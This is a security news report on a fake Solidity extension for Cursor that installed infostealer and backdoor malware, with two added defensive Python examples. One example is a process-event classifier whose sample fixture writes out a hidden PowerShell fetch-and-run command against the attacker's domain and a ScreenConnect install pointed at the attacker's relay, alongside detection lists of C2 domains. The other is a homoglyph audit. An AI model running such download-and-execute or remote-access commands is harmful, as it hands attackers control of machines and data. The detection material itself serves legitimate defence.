
Fake Visual Studio Code extension for Cursor led to $500K theft

A developer lost $500,000 in crypto assets after installing a malicious Visual Studio Code extension into the Cursor AI code editor, Kaspersky reported Thursday.

The “Solidity Language” extension was a spoofed version of the legitimate open-source “solidity” extension for VS Code, which offers features such as syntax highlighting for the Solidity smart contract programming language.

In reality, the fake extension performed none of those functions and instead installed the PureLogs infostealer, which collects browser, email and cryptocurrency wallet data, likely leading to the $500,000 crypto theft.

The extension was installed from the Open VSX registry, which became the default extension source for the Cursor marketplace last month. Cursor is based on VS Code and is largely compatible with extensions made for VS Code.

Extension abuses ScreenConnect, Internet Archive to install malware

The malicious extension kicked off its attack chain by downloading a PowerShell script from the domain angelic[.]su; this script checks whether the ConnectWise ScreenConnect remote desktop management software is installed.

If ScreenConnect is not present, the script downloads a second script from the same web server, which in turn downloads and runs a ScreenConnect installer from another server at lmfao[.]su.

ScreenConnect is then used to deploy three Visual Basic Scripts (VBScripts) from relay[.]lmfao[.]su, each of which downloads an additional script from the text-sharing website paste[.]ee.

That script retrieves an image uploaded to the Internet Archive at archive[.]org; the image uses steganography to hide a VMDetector-based loader. Once extracted, the loader retrieves the final payloads from paste[.]ee: the Quasar open-source backdoor and the PureLogs infostealer.
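The chain above has several detectable joints: an IDE process spawning a downloader shell, a ScreenConnect client installed out of band and pointed at an unfamiliar relay, and the ScreenConnect service spawning a script host. The following is an added example, not code from the article or from Kaspersky: a small Python classifier run over constructed Sysmon-style process-creation events shaped like that chain. The event fields and file paths, the approved-relay list, and the parsing of the relay host out of the ScreenConnect installer's `h=` parameter are assumptions; the domains are the ones named in the article.

```python
import re

# Constructed process-creation events modelled on the chain in the article
# (Cursor -> PowerShell -> ScreenConnect installer -> VBScript). Paths and
# command-line shapes are assumptions for illustration, not captured telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\dev\AppData\Local\Programs\cursor\Cursor.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"iwr https://angelic.su/x.ps1 | iex\""},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\dev\AppData\Local\Temp\ScreenConnect.ClientSetup.exe",
     "cmdline": "ScreenConnect.ClientSetup.exe ?e=Access&y=Guest&h=relay.lmfao.su&p=8041"},
    {"parent": r"C:\Program Files (x86)\ScreenConnect Client (abc)\ScreenConnect.ClientService.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //B C:\Users\dev\AppData\Local\Temp\a.vbs"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "cmdline": "Code.exe --new-window"},
]

IDE_IMAGES = {"cursor.exe", "code.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_CUES = ("iwr", "invoke-webrequest", "downloadstring", "downloadfile",
                 "net.webclient", "curl ", "bitsadmin")
# Infrastructure named in the article. paste.ee is only flagged when a script
# host reaches for it, since the site also has legitimate uses.
IOC_DOMAINS = {"angelic.su", "lmfao.su"}
PASTE_DOMAINS = {"paste.ee"}
# Relay hosts your own ScreenConnect deployment is allowed to use (assumed).
APPROVED_RELAYS = {"relay.corp.example"}

def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def hosts_in(cmdline):
    """Host names from URLs and from a ScreenConnect-style h=<relay> parameter."""
    return {h.lower() for h in re.findall(r"(?:https?://|\bh=)([a-z0-9.-]+\.[a-z]{2,})", cmdline, re.I)}

def matches_ioc(host):
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)

def classify(event):
    """Return the list of rule names an event trips (empty when benign)."""
    parent, image = basename(event["parent"]), basename(event["image"])
    cmd = event["cmdline"]
    hosts = hosts_in(cmd)
    hits = []
    if parent in IDE_IMAGES and image in SCRIPT_HOSTS and any(c in cmd.lower() for c in DOWNLOAD_CUES):
        hits.append("ide_spawned_downloader")
    if image.startswith("screenconnect.client") and hosts - APPROVED_RELAYS:
        hits.append("screenconnect_unapproved_relay")
    if parent.startswith("screenconnect.client") and image in SCRIPT_HOSTS:
        hits.append("rmm_spawned_script_host")
    if any(matches_ioc(h) for h in hosts):
        hits.append("known_c2_domain")
    if image in SCRIPT_HOSTS and hosts & PASTE_DOMAINS:
        hits.append("script_host_paste_site")
    return hits

def scan(events):
    """(event index, rule) pairs for every rule tripped across a batch of events."""
    return [(i, hit) for i, ev in enumerate(events) for hit in classify(ev)]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} :: {SAMPLE_EVENTS[idx]['cmdline']}")
```

The behavioural rules (IDE spawning a downloader, RMM service spawning a script host, RMM client bound to a relay outside your allowlist) are the ones worth keeping once the listed domains rotate; the domain match is there for the current campaign only.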

The loader, based on the legitimate open-source VMDetector project for detecting virtual machine environments, was previously observed in DCRat remote access trojan attacks targeting Colombian users, according to IBM.

PureLogs is part of the “Pure” malware-as-a-service (MaaS) family, which has been distributed since March 2021, according to ANY.RUN. The Quasar remote administration tool (RAT) is frequently misused by cybercriminals, including advanced persistent threat (APT) actors, as noted in a 2019 analysis report from the Cybersecurity & Infrastructure Security Agency (CISA).  

Kaspersky noted that its security software detects the PureLogs infostealer, but that the victim reported having relied only on free online malware-scanning services rather than any commercial antivirus.

Attacker manipulates algorithm to promote fake extensions

The “Solidity Language” extension involved in this attack has since been removed from the Open VSX registry, but prior to its removal, Kaspersky found that it ranked higher in Open VSX search results for the keyword “solidity” than the legitimate “solidity” extension developed by Juan Blanco.

The spoofed version, which used the same description and logo as the real version, had 54,000 downloads while the original had 61,000, but Kaspersky noted that other factors, such as how recently an extension was updated, also influence search rankings.

It is believed that, because the fake extension was last updated on June 15, 2025, while the legitimate one was updated May 30, 2025, the more recently updated version was ranked higher despite its lower download count. Overall, “Solidity Language” appeared fourth in the search results, while “solidity” appeared eighth.

After the malicious extension was removed, another extension with the same malicious functionality appeared under the identical "solidity" name, spoofing the developer's name by replacing the lowercase "L" in Blanco with an uppercase "I," two characters that look identical in the font used by the Cursor user interface.

This newer version appeared to have 2 million downloads, which Kaspersky noted was likely artificially inflated, and was displayed just below the legitimate "solidity" extension before also being removed.
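A lookalike of this kind survives a glance at the marketplace listing, so the check has to be mechanical. The following is an added example, not code from the article or from Kaspersky: a Python audit of installed extensions that compares each publisher.name against a trusted list through a confusables "skeleton", so that "BIanco" (capital I) collides with "Blanco" and a renamed clone such as "Solidity Language" under another publisher is flagged as well. The ~/.cursor/extensions directory layout, the package.json fields and the trusted ID "JuanBlanco.solidity" are assumptions; verify the real publisher ID against the registry before relying on it.

```python
import json
import unicodedata
from pathlib import Path

# Extension IDs you trust, in publisher.name form as shown on the registry.
# "JuanBlanco.solidity" is the assumed ID of the legitimate extension named
# in the article; confirm it on the registry page before using this list.
TRUSTED = {"JuanBlanco.solidity"}

def skeleton(s: str) -> str:
    """Map visually confusable characters to one representative so that names
    which look the same in a UI font compare equal. Covers the I/l collision
    from the article plus a few common Latin confusables; it is deliberately
    aggressive, since a false positive here only costs a closer look."""
    s = unicodedata.normalize("NFKC", s).casefold()
    s = s.replace("rn", "m").replace("vv", "w")
    return s.translate(str.maketrans({"i": "l", "1": "l", "|": "l", "0": "o"}))

def audit(installed, trusted=TRUSTED):
    """installed: iterable of (publisher, name). Returns (publisher, name,
    reason) for every extension that is not exactly a trusted ID but looks
    like one, either as a full homoglyph twin or by reusing a trusted
    extension's name under a different publisher (the "Solidity Language"
    pattern). The exact-ID comparison is case-sensitive on purpose."""
    findings = []
    split = [t.split(".", 1) for t in trusted]
    for pub, name in installed:
        if f"{pub}.{name}" in trusted:
            continue
        for tpub, tname in split:
            if skeleton(pub) == skeleton(tpub) and skeleton(name) == skeleton(tname):
                findings.append((pub, name, f"homoglyph twin of {tpub}.{tname}"))
            elif skeleton(tname) in skeleton(name):
                findings.append((pub, name, f"reuses name of {tpub}.{tname} under another publisher"))
    return findings

def installed_extensions(root=None):
    """Read publisher/name from each installed extension's package.json.
    The default directory is the assumed Cursor layout; VS Code itself uses
    ~/.vscode/extensions. Unreadable manifests are skipped, not fatal."""
    root = Path(root) if root else Path.home() / ".cursor" / "extensions"
    found = []
    for manifest in root.glob("*/package.json"):
        try:
            meta = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        if "publisher" in meta and "name" in meta:
            found.append((meta["publisher"], meta["name"]))
    return found

if __name__ == "__main__":
    # Constructed sample mirroring the article: the real extension, the
    # capital-I twin, the renamed clone and an unrelated extension.
    sample = [("JuanBlanco", "solidity"), ("JuanBIanco", "solidity"),
              ("someone-else", "Solidity Language"), ("ms-python", "python")]
    for pub, name, why in audit(sample):
        print(f"FLAG {pub}.{name}: {why}")
    # Against a real install:  for f in audit(installed_extensions()): print(f)
```

Run it against `installed_extensions()` on a developer machine after any extension install; a hit on the "homoglyph twin" reason is the specific case from this campaign, while the "reuses name" reason catches the earlier "Solidity Language" style of clone.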

Additional campaigns on the VS Code Marketplace and npm package repository are believed to be connected to the same attacker based on similar attack chains or use of the same command-and-control (C2) server.

In May, Datadog reported on malicious extensions in the VS Code Marketplace called “solaibot,” “among-eth” and “blankebesxstnion,” which bore similarities to “Solidity Language,” including use of an image hosted on the Internet Archive.

Kaspersky also used its open-source package monitoring tool to discover an npm package called “solsafe” that installs ScreenConnect and connects to the relay[.]lmfao[.]su C2 server.
